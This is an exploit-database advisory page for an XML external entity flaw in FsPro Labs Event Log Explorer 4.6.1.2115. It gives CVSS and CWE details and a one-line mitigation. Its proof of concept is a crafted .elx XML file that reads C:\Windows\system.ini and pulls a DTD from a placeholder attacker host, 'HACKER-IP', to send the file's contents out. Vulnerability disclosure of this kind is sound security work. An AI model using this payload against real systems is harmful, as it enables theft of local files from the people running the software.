header-logo
Suggest Exploit
vendor:
Event Log Explorer
by:
hyp3rlinx
8.8
CVSS
HIGH
XML External Entity Injection
611
CWE
Product Name: Event Log Explorer
Affected Version From: 4.6.1.2115
Affected Version To: 4.6.1.2115
Patch Exists: NO
Related CWE: N/A
CPE: a:fspro_labs:event_log_explorer:4.6.1.2115
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

FsPro Labs Event Log Explorer v4.6.1.2115 – XML External Entity Injection

Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers can potentially gain access to local files.

Mitigation:

Disable XML external entity processing in the application's XML parser configuration.
Source

Exploit-DB raw data:

# Title: FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection
# Author: hyp3rlinx
# Date: 2018-09-01
# Vendor: www.eventlogxp.com
# Software: https://eventlogxp.com/download.php
# Affected Component: elex.exe
# CVE: N/A

# Description:
# Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers 
# can potentially gain access to local files.

# PoC
python -m SimpleHTTPServer
 
"test.elx"

<?xml version="1.0"?>
<!DOCTYPE gga [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
%dtd;]>
<infodisclosa>&send;</infodisclosa>

Navigation

Suggest Exploit

Services By CQR